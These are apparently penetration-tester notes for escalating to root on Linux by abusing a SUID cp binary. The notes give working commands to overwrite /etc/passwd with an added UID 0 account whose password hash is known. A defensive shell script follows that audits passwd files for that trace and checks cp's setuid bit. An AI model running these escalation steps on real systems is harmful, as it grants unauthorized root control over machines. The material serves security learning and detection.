CP SUID
- Check for SUID binaries: find / -perm -u=s -type f 2>/dev/null
- If cp is in the list, go ahead
- On victim: cat /etc/passwd
- On attacker: nano passwd, and paste the data from the victim
- Generate a salted MD5-crypt hash of the password pass123 for the newroot user
openssl passwd -1 -salt ignite pass123
value = $1$ignite$3eTbJm98O9Hz.k1NTdNxe1
- Add a new line to the passwd file
newroot:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash
- Transfer the file to the victim
- cp passwd /etc/passwd
- su newroot
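
Detection side of the steps above, as an added example (not part of the original notes): a shell audit that flags the two artifacts this technique leaves in a passwd file, a non-root UID 0 account and a hash stored inline in the password field, plus a check for the SUID bit on cp. The function names and the sample file are constructed for illustration; the newroot line is the one from the notes.

```shell
#!/bin/sh
# Added example: audit passwd-format data for the traces of an overwritten
# /etc/passwd. All function names here are hypothetical helpers.

# audit_passwd [FILE]: read FILE (or stdin) and print one finding per line.
#   UID0 <user>            account other than root with UID 0
#   INLINE_HASH <user>     password field holds a hash instead of x, * or !...
#   EMPTY_PASSWORD <user>  password field is empty
#   MALFORMED line <n>     entry does not have 7 colon-separated fields
audit_passwd() {
    awk -F: '
        /^#/ || NF == 0        { next }
        NF != 7                { print "MALFORMED line " NR; next }
        $3 == 0 && $1 != "root" { print "UID0 " $1 }
        $2 == ""               { print "EMPTY_PASSWORD " $1; next }
        $2 !~ /^(x|\*|!.*)$/   { print "INLINE_HASH " $1 }
    ' "${1:--}"
}

# cp_suid_path: print the path of cp if it carries the setuid bit,
# which is the precondition the notes start from.
cp_suid_path() {
    p=$(command -v cp) || return 0
    if [ -u "$p" ]; then printf '%s\n' "$p"; fi
    return 0
}

# Constructed sample: three ordinary entries plus the line added in the notes.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
newroot:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash
EOF
}

# Demo run over the constructed sample; use `audit_passwd /etc/passwd` on a host.
sample_passwd | audit_passwd
cp_suid_path
```

If cp_suid_path prints a path, clearing the bit with chmod u-s on that file removes the precondition.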